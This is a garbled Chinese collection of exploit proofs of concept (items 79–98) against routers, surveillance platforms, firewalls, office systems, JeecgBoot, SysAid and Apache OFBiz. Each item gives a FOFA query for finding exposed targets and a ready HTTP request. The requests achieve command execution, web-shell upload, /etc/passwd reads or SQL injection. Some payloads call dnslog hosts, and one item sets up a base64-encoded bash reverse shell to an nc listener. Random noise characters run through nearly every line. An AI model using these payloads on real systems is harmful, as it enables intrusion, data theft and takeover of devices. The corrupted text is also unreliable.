% {4 V9 d/ s. OGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1" M* B( u! _! y$ x
Host: x.x.x.x, v" J: J5 A3 Y3 o1 o- K
, y* \" |+ n- @3 s3 O: y) x
/ K7 u4 c3 a# B8 D x1 [79. BYTEVALUE 百为流控路由器远程命令执行
3 k4 T: K' i$ ~2 fFOFA:BYTEVALUE 智能流控路由器0 W3 }6 ~# J7 u$ D r/ a% _
GET /goform/webRead/open/?path=|id HTTP/1.1
# Z+ U3 N* R$ `3 u& LHost:IP- e; N2 m# ?) z1 R2 `7 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
, ]6 C9 m0 [$ V- [. \# |9 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ E2 O, |, c9 a r5 F1 p. bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 y" L. E0 J& r! _) g4 x s+ k; Q
Accept-Encoding: gzip, deflate
x3 _5 X$ A N' i" ]. o/ Z) cConnection: close1 C) E- M0 V$ u; J. }/ q; N# E1 u
Upgrade-Insecure-Requests: 18 W, C, J6 O5 g$ T% [
0 N( C5 u/ @8 Z7 O7 |
0 ?( e* N9 i+ \' J& g+ {! O
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传, ~: \6 p0 l: k' t4 d p
FOFA:app="速达软件-公司产品"
N, ~" V: r( N o/ x2 TPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1& ~- S2 V- S8 [% M6 [* y, h
Host: x.x.x.x# |' \ h; |# J; i4 Z, ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 A! z( Q, ~' C8 NContent-Length: 27: p' t+ G- _/ S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 d* b4 f( z4 X6 Z& K3 Y9 m7 @" t
Accept-Encoding: gzip, deflate
# r3 a" `3 Q, z' m" TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" n/ |! n( r1 g3 p# N/ j* ?
Connection: close+ ^4 o; M" ]! d9 {: m/ ^
Content-Type: application/octet-stream
, t0 u! m# F' o% [$ j. z+ j' T& lUpgrade-Insecure-Requests: 1+ U6 S6 g6 _* y7 m8 X; `- q( a5 P5 a
& c3 y8 u: \! b" N5 R
<% out.print("oessqeonylzaf");%>
9 k \# u0 f" o9 Z" X7 X( }
2 R* \8 j+ t% S% g
) X+ o t v0 \/ D8 yGET /xykqmfxpoas.jsp HTTP/1.15 \1 M& @# V$ s+ S" p1 @! U
Host: x.x.x.x' x" h, J* f% H& j I/ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ a. C t* l! A; ?Connection: close2 g; e$ C7 y8 w' F
Accept-Encoding: gzip
, S1 B! b: Y7 w" \" L" ]
5 Y/ Z% L( U- U* ?5 F# Q& \" B4 ^# s6 _7 \& e
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露0 U; y* S: _; C. t# O0 O3 H
FOFA:app="uniview-视频监控"# B7 h, Q. r; i% B% _9 n1 d
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1& m" J _( t8 l' |; B+ q6 h
Host: x.x.x.x" K P" n* u: _# z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 n! _) w* k5 }$ S+ J' H( K
Connection: close% ^/ O0 L' I+ { s
Accept-Encoding: gzip V* Z+ ~$ [0 I, ?1 ~, y' O6 H
' U9 S* L! d5 L: U. l1 ~( I$ I7 A7 J' v* X
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
" H. J. G, }" J/ p' {- oFOFA:app="思福迪-LOGBASE"
. k: p R% W+ q c$ }5 a5 T8 @5 GPOST /bhost/test_qrcode_b HTTP/1.1+ \1 _2 v, K+ ]0 Q0 \! s) z
Host: BaseURL$ I4 Q. A" \7 B8 P% }
User-Agent: Go-http-client/1.1
4 R( a+ {9 j3 ~" w4 FContent-Length: 23/ \; ]4 n5 v3 o1 a5 s# L9 ]
Accept-Encoding: gzip
1 e9 w$ l. t8 K+ O) FConnection: close, z# _8 g( W! P% V
Content-Type: application/x-www-form-urlencoded' D; b# @1 j A0 i+ e
Referer: BaseURL# o A$ V H8 L. B5 j. A8 Q1 B
8 b6 }; z$ r7 j6 N. ^: o' l
z1=1&z2="|id;"&z3=bhost
" T: P4 y6 y3 U+ m* {# {1 |4 d5 i# r( b U, Q+ f
& x, m7 `/ Q) V% ~; b7 G Q5 ~% W
83. JeecgBoot testConnection 远程命令执行. [8 c9 g( F; h3 P0 Y; I
FOFA:title=="JeecgBoot 企业级低代码平台"0 a; p* S5 o& v/ D2 _8 U
0 T$ O3 ] U' E" I' g. ^
! k* t$ _6 B+ c8 r) ePOST /jmreport/testConnection HTTP/1.1& a4 E3 j7 v! D* L0 Y
Host: x.x.x.x
# U% ]) T7 x' F% E/ UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& ]9 l5 R7 W' b9 KConnection: close
. N- u5 i9 b5 }0 ~Content-Length: 8881* D- k; Q* K; K: \6 G7 d6 n
Accept-Encoding: gzip
% I) X( e2 G; S5 k2 FCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
, m0 U/ E2 `6 o+ B0 A! m6 mContent-Type: application/json
5 B: L( J# X* C H3 K2 I& y6 P6 S# g: W
PAYLOAD9 E7 |* c: ` ^% k/ z
$ P' Y9 _' q: L3 v; J, E5 X0 C
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
/ k" H, v. |' P: Q1 B( xFOFA:title=="JeecgBoot 企业级低代码平台"+ z3 p/ c ?3 }3 U( ?6 E O1 ~
2 m4 W4 N/ B% ], i/ b- D% `0 @4 f
( g+ v- @- D' v' B! |0 A
5 I# }8 L1 V5 m$ U1 i4 J
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
2 T; d1 t1 R1 N( WHost: 192.168.40.130:8080
! R. r+ Z, _* q6 d6 P; A4 qUser-Agent: curl/7.88.1: \/ D, ~2 z5 o. R8 F1 Z1 I
Content-Length: 1560 ~2 A `) x2 Q$ Z' _3 i. z
Accept: */*
3 y% b1 U6 m5 E9 F e1 I! FConnection: close
' z9 O0 S% ?7 f- p2 k- BContent-Type: application/json
8 r5 n' K' C# T# I7 p5 x5 GAccept-Encoding: gzip1 d6 `" Q( P4 ?! z, U
2 f2 J! H7 N: r" I
{
- G" }7 D! b2 s$ z4 ?/ ]- l* E3 E "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
4 h) e6 h& F% y8 Q "type": "0"& O4 R1 ^; j& e3 \- d/ M: S
}3 p' P7 [, A5 G% Y9 M6 s
: d# Q7 j8 @, k$ F
8 c0 |) D' t) y) W5 I* H85. SysAid On-premise< 23.3.36远程代码执行
4 E' O9 r! f8 r) z4 z; C, u& g2 {CVE-2023-472462 |5 P9 Z* }1 B1 j& b1 D, B
FOFA:body="sysaid-logo-dark-green.png" 7 D' Y2 u$ y) o4 ^; c$ l
EXP数据包如下,注入哥斯拉马
5 l* ^. C, p+ Y3 [% k2 ePOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.18 Z. Y3 F/ x/ c
Host: x.x.x.x
6 [$ p Z/ j6 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( Y+ J0 a+ j& r2 {# r; B" BContent-Type: application/octet-stream7 H, ?+ X" B0 `. d
Accept-Encoding: gzip) C! D+ w; i" \8 n" H
* P8 W5 b+ n S* [$ C
PAYLOAD
8 c/ j! L3 Y3 L" i9 L
. J( @1 z2 ?3 C8 c; i7 e* t回显URL:http://x.x.x.x/userfiles/index.jsp( t: L ~5 E$ W! B4 B
9 |$ _' M9 i* m& _86. 日本tosei自助洗衣机RCE
" v6 F8 h$ F% N& s0 pFOFA:body="tosei_login_check.php"
* w3 A$ l0 \+ R. W7 W1 ?POST /cgi-bin/network_test.php HTTP/1.11 g' m i# W; [1 [
Host: x.x.x.x
* W M a- }! h3 PUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.361 X3 j+ G3 B; W! [$ m2 d% [. Q
Connection: close
8 s$ N$ Z: K7 w% I# P$ Z3 r7 cContent-Length: 44: V$ ?0 x4 y, [; E! O: b
Accept: */*" p) b6 s* J$ @: i8 n
Accept-Encoding: gzip
5 D% A9 A9 h7 q- ~Accept-Language: en
9 H0 i5 l# N! k- g( t3 m2 F& R0 s2 CContent-Type: application/x-www-form-urlencoded
! D8 J. N1 a3 h& G4 c ^' Q b- {0 U1 O
host=%0acat${IFS}/etc/passwd%0a&command=ping
R& P. R& s: h) v# p6 D3 ^3 c$ L9 Q, ~2 s& H6 o. T @
/ l* v" c$ d9 c4 ^0 P5 ^. f87. 安恒明御安全网关aaa_local_web_preview文件上传
; ?; w, r! e" g" Y/ y2 C* X2 Z9 q; DFOFA:title="明御安全网关"
! a1 v; g8 f" w* |6 F, l3 UPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1$ u7 s" ^% k: g
Host: X.X.X.X- M2 t. T2 Y: e T( |& [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 p8 V$ U; @2 R LConnection: close, M! K# |) M! m1 e7 D, z' P
Content-Length: 198! R4 a$ O8 I5 z& J
Accept-Encoding: gzip" E6 |/ E& g& M, B j
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
* W+ C5 O* H6 m' y/ e z$ j) }3 G% l h- p! B* }' ^
--qqobiandqgawlxodfiisporjwravxtvd
9 V+ Z5 t1 X. ?7 u: n& P, m, w6 tContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"/ t3 G* R% J; U9 Y& r! y
Content-Type: text/plain
, Z$ `& R8 x# r( i: o
7 Q; g! s% W) y/ p7 B; L. W4 i2ZqGNnsjzzU2GBBPyd8AIA7QlDq
( j8 i' P7 \# y. N$ r( n& k1 ^--qqobiandqgawlxodfiisporjwravxtvd--
- m5 c- O$ G7 h4 D& C
9 p$ P6 k( t) e& l6 H1 |1 N) a% x4 _, ?% J
/jfhatuwe.php
3 O, v9 p/ r! B/ v
8 |! w8 c+ N. A* o' |9 X6 d I88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
* c1 C0 {! p0 Q. U7 EFOFA:title="明御安全网关"2 `2 J& z1 o: D
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.11 D7 \4 A4 i3 Z3 ], \
Host: x.x.x.xx.x.x.x
* i! O7 g" q9 m+ ~$ K$ X6 l, tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 F+ D/ S& {& }0 d* o: f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- f& h0 J/ z+ U. ?! W1 I( L
Accept-Encoding: gzip, deflate6 B8 S0 x' f9 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 y% A) |; J# Z! e5 C
Connection: close- p) }$ U! `4 z2 c" i
3 N, c0 f( D F y1 _+ P; Q$ q0 c4 Q2 C: z$ F# _/ P# _7 n
/astdfkhl.php
) z8 u6 l8 v, ~3 J& u: s' g
7 ?# A6 S# M) G% [% o89. 致远互联FE协作办公平台editflow_manager存在sql注入- I8 n4 Z. ]; L
FOFA:title="FE协作办公平台" || body="li_plugins_download"; ]! t5 J1 u2 N/ H# e Y1 `3 I8 s9 [
POST /sysform/003/editflow_manager.js%70 HTTP/1.1* C" S( f4 e" P4 i( Z% n) V
Host: x.x.x.x7 u4 L. R/ H) e0 [# r7 B- A5 b) z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, S8 p+ s. H, r" A9 @7 R
Connection: close+ u! B M% D+ |* [
Content-Length: 419 z% A3 W: |. K' V# a
Content-Type: application/x-www-form-urlencoded! `$ k! _( z* j& Z6 v) [) ?7 j
Accept-Encoding: gzip, r. M1 e* z3 A3 s: P8 `. P
3 A( k( V2 G: q9 voption=2&GUID=-1'+union+select+111*222--+
! z7 w9 L0 N' W( ^* n5 c8 P* D0 p% `; K4 o6 X
6 O8 K# h4 w4 D! X5 m8 K7 h# C
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
/ L- l' T! Y# @! iFOFA:icon_hash="-1830859634"
3 k" K0 h+ T k' A' x; CPOST /php/ping.php HTTP/1.15 c+ ^* |' ]; P1 O7 A
Host: x.x.x.x
+ w. X" K5 o! ], I2 f( A8 @* p. uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0, v1 T! s0 t2 e4 n, ~; b; R7 }4 [* L
Content-Length: 51: o) m {$ U, H2 m/ V
Accept: application/json, text/javascript, */*; q=0.01: L; D+ v1 J2 {5 v# d+ b( a
Accept-Encoding: gzip, deflate
7 c) s! }0 q0 P" z" [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 O+ o+ i6 r& {4 m" K& TConnection: close, N# ~& Y" Q* D3 s, z
Content-Type: application/x-www-form-urlencoded
. r% h1 o9 d, y4 ]" q% i" r$ cX-Requested-With: XMLHttpRequest
; ^$ I) r# T2 `5 |: {! q! F+ m! g) E* c9 W( ?
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig: Z" p- r) F3 A" k0 x+ u* A
* B7 I$ L8 o. V( p
( F/ d/ B- y5 J) `' u
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
9 b! G$ J0 E6 G# B A4 r; i0 bFOFA:title="综合安防管理平台"
8 D# j: q3 H! g2 ?1 V# |" @) uGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.17 A- Y/ T' R9 K- V: q
Host: your-ip$ b/ S$ T: e& V; M* q4 D; e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36% G7 f+ _; t8 [: ~9 H( H- c
Accept-Encoding: gzip, deflate( M: a6 {' A( {: X$ p. s* _
Accept: */*( L% O9 p. Q% O% @/ N- ~1 G$ t/ A
Connection: keep-alive) T' c! c+ R) k: c8 w4 ^# r
! f2 d' e3 b) j' J# |8 k* ~3 X0 d4 j5 L- X; I$ k9 Z
' _# l' U v$ b& M: V92. 海康威视运行管理中心session命令执行2 N5 G; X* I/ g2 _7 x% ~2 d
Fastjson命令执行& I# F0 a `4 ]% Y+ d6 X7 ^ K
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"0 t2 H2 V. x5 f( n s, d& e+ r
POST /center/api/session HTTP/1.1
: |4 C% A. q# ?' ?3 B+ }8 XHost:
( e0 `' I, `6 L- A! {Accept: application/json, text/plain, */*5 F1 `- S# m& p
Accept-Encoding: gzip, deflate1 N8 q7 x' a I7 @- I
X-Requested-With: XMLHttpRequest
' S" o' l' u+ ~Content-Type: application/json;charset=UTF-8# z7 n* }. e! Y9 ^9 ~
X-Language-Type: zh_CN
; f7 Z0 Q5 K" y, n- m* s$ a0 QTestcmd: echo test& a8 o9 c! Y) H' Z# y" g/ k$ q# _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
) w) ^9 c: c1 c8 B/ p2 MAccept-Language: zh-CN,zh;q=0.9
* Y; s$ k; C ^0 @1 w2 b) Z. B3 ^4 mContent-Length: 5778
9 I+ Y K$ y- ~9 b
4 {% u- Q% a+ CPAYLOAD! D+ m; b# ]3 L4 I# j7 H- k) t
, ]9 ^2 P8 m" N% S9 h1 ^
9 M* ?) ^. c) e' F, a! _# M8 O93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传! ^3 }$ ?& i9 A6 G) N1 K* r& P5 s
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
8 o: [ u( ?9 B) F7 rPOST /?g=app_av_import_save HTTP/1.1
6 i; m) l& N, B* C& D4 D# BHost: x.x.x.x! w: X! ^ C- T# R: G! m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
: o4 l+ f* ?% r8 b' J/ \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. d5 N: W& v" H8 K2 ~$ [
) \1 R O4 z& `, I& S& v
------WebKitFormBoundarykcbkgdfx% b9 t: c7 n* c- J
Content-Disposition: form-data; name="MAX_FILE_SIZE"/ ], [# Y N. e% f% ?# f4 X
( U, A: b5 s, S100000009 o. @0 ~; c+ s& n3 N0 m! F
------WebKitFormBoundarykcbkgdfx5 R6 F$ C* s. j9 E" G
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
$ e0 r' ^7 p" A. m! e; m+ `% {Content-Type: text/plain7 M! _" E2 g% [* A1 b7 ^$ m
7 s+ a1 S& G$ v$ S4 Z# h8 e
wagletqrkwrddkthtulxsqrphulnknxa2 G" c5 I' d7 M5 q
------WebKitFormBoundarykcbkgdfx# g9 C- x0 p* J) Y) {! T, O
Content-Disposition: form-data; name="submit_post"
( k% f* k7 O' v" w R0 x% c+ s" L2 F" g4 j* C, y
obj_app_upfile9 H% S/ K0 H4 y. T1 Y+ y+ {
------WebKitFormBoundarykcbkgdfx
, @% z0 }7 U! `Content-Disposition: form-data; name="__hash__"
: Q" S9 O s' E* d+ ~, P" O+ O k7 d) L' B
0b9d6b1ab7479ab69d9f71b05e0e9445) }9 g) v; H/ o$ o5 k
------WebKitFormBoundarykcbkgdfx--
, H- l* s) h3 T. d4 Y% {
; u+ H. \. m! g$ X' A1 {: u; [) d+ B2 A. p7 A# }) S( f G
GET /attachements/xlskxknxa.txt HTTP/1.1
* q: {* _+ w, rHost: xx.xx.xx.xx
0 P1 b( D- ~9 U( DUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: o& {& S9 I3 M7 E% s5 x$ F3 v
5 l( z% G7 o/ ~# [) X( W) q2 |8 T94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
( y9 f) A% k! f. D; \( ~FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
" [9 F1 S( M" {, NPOST /?g=obj_area_import_save HTTP/1.1
/ |& q3 {( X) FHost: x.x.x.x
. ^& t& x- Y6 m8 i/ yContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
. b. u+ Y" A7 l& |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. |: C2 j3 q' t4 {. h4 R) Z( o
/ c, c% p( l3 U. e( F- h3 e------WebKitFormBoundarybqvzqvmt
: W' [, f1 N% m0 ?- PContent-Disposition: form-data; name="MAX_FILE_SIZE"; p5 J9 Q1 T7 c4 v# ?# D6 P1 Q
7 A2 U2 j$ x M* T5 B @% s2 `10000000& C5 X# O, H* h' `2 k
------WebKitFormBoundarybqvzqvmt
& v% l1 V" ]% ^Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
% w/ w- v! L3 K/ y6 i) HContent-Type: text/plain# X: [7 I1 M5 V3 v- R3 G: c0 ~! J
& k. _ a3 u' K3 L1 {0 N, y
pxplitttsrjnyoafavcajwkvhxindhmu6 |: _. D S4 T
------WebKitFormBoundarybqvzqvmt3 h3 C& C$ ~2 y/ Q6 R( f8 \! V
Content-Disposition: form-data; name="submit_post"
9 T9 d+ H+ B' p; u! c; g) X% u
( k4 E, n' H( Y' S+ C* Z. f+ }2 Kobj_app_upfile
2 F/ o3 e$ d4 Y5 j3 v" _------WebKitFormBoundarybqvzqvmt( s$ B4 ?& m; \( l9 D0 v) _. X
Content-Disposition: form-data; name="__hash__"
- z3 ~- f3 w2 H% i5 a: z5 g% p/ e: Y* O
0b9d6b1ab7479ab69d9f71b05e0e9445 C$ d4 {) b# i, }% u
------WebKitFormBoundarybqvzqvmt--8 w: j d) z: B6 n M8 [; s
2 W/ X' b* k# r& U/ X& N
& G- n, ?# B1 S: h; a6 d
D" O" u7 J& \1 r1 f" P
GET /attachements/xlskxknxa.txt HTTP/1.1) k/ N2 G5 D. b- \( K# K: K
Host: xx.xx.xx.xx
. m& T' D: H" w9 D6 o9 ]/ b# PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' l/ s% v+ v' n9 |: ?
) }9 f* [* h0 j2 V6 k5 e+ l
+ d, y. r9 _5 z1 A8 f
2 ?& b L' m% C/ g, G" A95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
8 f# |) W# ]- P' a/ ]CVE-2023-49070
" J! t5 l9 v: v! f, y1 H. J: TFOFA:app="Apache_OFBiz"3 J* z0 R, L% W4 p* |
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
. q2 ~9 N. s3 w1 T+ L' \7 A8 NHost: x.x.x.x
8 o- T r* O- p) h; qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% j2 a; l2 @0 q, Z4 K C! eConnection: close c0 k }' j. x0 M6 o( }0 T+ G
Content-Length: 889
* G7 X; N: C3 |Content-Type: application/xml" [$ m; Q: P' H _/ [" n
Accept-Encoding: gzip! D! M3 D5 H/ B: e
/ J( f' M: F6 M0 Y" O. D3 L \. ?<?xml version="1.0"?>
0 y7 O% A' a0 z% _/ j! @( t5 \<methodCall>
4 Y# |" ?2 O1 B/ w! s <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>/ @6 S2 }( c5 _+ \
<params>" _$ S* I' D2 M* A
<param>) d0 K5 r9 d' a% m# s1 v
<value>
V$ W) i9 L0 `, E2 h7 o- V, | <struct>2 D+ ] @. O0 z: `- q% ?4 ?; h" T. m
<member>
9 R: ^# S" H! B5 S <name>test</name>6 M/ M9 V" S/ M. T/ D- I
<value>
! G) m' v d2 J3 [+ r <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
" A- Z9 `* x3 s. D </value>
6 ~; i* g. o j, n+ L </member>
, L* _9 V: X9 T" J </struct>& P6 [6 l+ }; A$ a+ c: d8 ?
</value>
6 P( e, Y* C3 S! P: v" T+ q </param>
X, T9 B' x" K# k </params>
8 Y x$ X0 u. o5 Q' @1 g1 p</methodCall>2 } {' ~4 z7 p+ z; e+ a
1 N: Q: I. y- ^! p& I1 m, O- _6 N; ]9 B: d
用ysoserial生成payload
1 N% U' r4 y; b0 wjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
6 v4 d( b8 _# J% k. k) M$ R- ?; h4 {" I2 E4 w
4 T, l1 V+ N- s: ?将生成的payload替换到上面的POC
% W$ W7 W' w: O1 B; h1 k% j3 mPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1& N* u" X, ?& _
Host: 192.168.40.130:8443
2 R& Y1 z! D$ @5 Z' e2 }6 v0 ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. W2 i8 }) V5 \* L
Connection: close& m& P- O4 y8 W' o; L/ L
Content-Length: 889
: Q* o8 c9 a1 \7 ^Content-Type: application/xml
, U' j4 L3 W8 q |- D9 `Accept-Encoding: gzip
( m f6 `0 n8 X$ C+ I! V0 s% V
PAYLOAD
3 I# K, V- U, w D2 `* a2 V9 D, P S* K" N6 j
96. Apache OFBiz 18.12.11 groovy 远程代码执行" p2 u _+ P. E3 V" k, s* `$ W
FOFA:app="Apache_OFBiz"
9 U; E E$ n7 e7 Q) {% R7 CPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
* e6 p, r @" M9 ^: ?! Z" d! wHost: localhost:8443
7 A) [6 l( q- _* Z6 Y. X0 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. w& s1 I8 y, z% f. o/ @6 Y
Accept: */*
f/ M Z' l9 v9 UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' z8 J# C9 Y( G$ @% ZContent-Type: application/x-www-form-urlencoded
$ p! _6 Z Z, s/ m+ x4 IContent-Length: 55
3 c+ c/ C1 s& y# }
) U2 }/ \/ M. g5 W$ y q `3 FgroovyProgram=throw+new+Exception('id'.execute().text);
" l% W, ~" Y9 @+ d7 V2 S7 F
w! f' p; L. g9 b' p% _ E
1 r7 O/ F2 N o. g( c反弹shell
$ Y0 M6 j; C7 W' r6 E5 X在kali上启动一个监听" U; s) k! t! S" \$ p& O3 u3 N
nc -lvp 7777
4 V+ ~* e% C4 N: t1 U& U* c" ~2 o7 v- ~! F5 y
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.12 L" [4 a" b& Q* O8 a% D$ J9 `
Host: 192.168.40.130:8443
) ^4 s5 O0 _ i2 P$ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( L# x% w5 @; q i8 B! Y, iAccept: */*, O! _# c \1 w; G: s' o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 [- y# M( \' G8 D" v
Content-Type: application/x-www-form-urlencoded
0 J6 `, W' s# |/ s4 v( }Content-Length: 71/ r/ C6 c2 x+ v: `% D
0 y" _ U5 Q: v6 G
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();. s, o5 i/ {2 L
( V, ?/ H; |* C, }- z3 G
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
$ c* X. a5 C' GFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客", a Y; p0 x. Q. K
GET /passport/login/ HTTP/1.1
2 z! _- ?6 E; l/ VHost: 192.168.40.130:80850 w$ @) m. d) ?' H9 L* C! N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 V: d5 Q8 r( u, H* n2 G: B
Accept-Encoding: gzip
i; f. X+ P9 Z3 aConnection: close
1 [8 [) ^, I% p. M: v5 b1 `2 J+ |Cookie: rememberMe=PAYLOAD1 w6 N4 q, n: m. A) z& E: {" a
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
( W3 ]) n1 Q8 D5 Z
! O2 E8 q9 Z/ ^) D" s; N F; Q P
- @. R' z G0 `$ X0 Q98. SpiderFlow爬虫平台远程命令执行
) o$ E( `) d9 [; Q4 k: {1 V2 U# ]CVE-2024-0195& ^. Q6 z4 e( @
FOFA:app="SpiderFlow"0 A# r$ }# t* U' M' d
POST /function/save HTTP/1.1$ P7 h. [. T' s2 }; Q
Host: 192.168.40.130:8088
1 ?- C! ]* D# a5 ^% }( dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ }: v; g) z6 g5 R
Connection: close9 w! _- [& Q% R% _4 W) t+ @
Content-Length: 121( E! y" b4 }* H- z8 h
Accept: */*
! f: {/ ?3 y& q6 ^% M1 O8 r! m5 @Accept-Encoding: gzip, deflate( J) C: d- n3 C/ f
